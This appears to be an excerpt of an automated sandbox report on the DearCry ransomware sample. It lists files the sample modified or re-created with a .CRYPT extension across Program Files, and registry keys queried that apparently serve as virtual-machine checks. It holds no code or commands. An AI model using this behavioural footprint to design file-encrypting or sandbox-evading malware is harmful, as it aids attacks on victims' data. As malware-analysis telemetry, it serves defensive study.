File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-72_altform-lightunplated.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\PROGRAM FILES\WINDOWSAPPS\MICROSOFT.VCLIBS.140.00.UWPDESKTOP_14.0.27629.0_X64__8WEKYB3D8BBWE\MICROSOFT.SYSTEM.PACKAGE.METADATA\AUTOGEN\readme.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.scale-400_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-16.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\uk-ua\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Windows Media Player\Media Renderer\DMR_48.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\ru\System.Windows.Controls.Ribbon.resources.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\fxplugins.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Proof.Culture.msi.16.es-es.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\csi.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\Logo.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libadf_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libskiptags_plugin.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\fr-FR\View3d\3DViewerProductDescription-universal.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\8.0.2\Microsoft.DiaSymReader.Native.amd64.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-localization-l1-2-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-150_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-125_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\legal\jdk\mesa3d.md C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalAppList.targetsize-16_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-GoogleCloudCache.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hu-hu\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\EdgeUpdate_bk\1.3.187.41\msedgeupdateres_it.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fr-fr\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-convert-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\xmlrwbin_xl.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\ODATACPP.DLL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-black\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\MicrosoftLogo.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\icudt58.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-processthreads-l1-1-1.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-us\wintlim.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nl-nl\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Redshift\lib\OpenSSL64.DllA\ssleay32.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\System\mfc140u.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FirstRunMailBlurred.layoutdir-RTL.jpg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarLogoExtensions.scale-48.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Work\contrast-black\LargeTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ThirdPartyNotices.MSHWLatin.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ja\UIAutomationClientSideProviders.resources.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\Client2019_eula.txt.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\FrameworkList.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\root\ui-strings.js C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jre-1.8\bin\api-ms-win-core-datetime-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\sv-se\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\plugin.js.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.NETCore.App\7.0.16\System.Net.WebClient.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\Java\jdk-1.8\bin\api-ms-win-crt-utility-l1-1-0.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Wide310x150Logo.scale-150.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleSplashScreen.scale-200.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\snooze.contrast-black.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\StoreLogo.scale-100.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\vscroll-thumb.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\es\UIAutomationClient.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File created C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\6.0.27\de\UIAutomationClientSideProviders.resources.dll.CRYPT C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A
File opened for modification C:\Program Files\dotnet\shared\Microsoft.WindowsDesktop.App\7.0.16\ru\System.Windows.Controls.Ribbon.resources.dll C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\DearCry_13_03_2021_1292KB.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
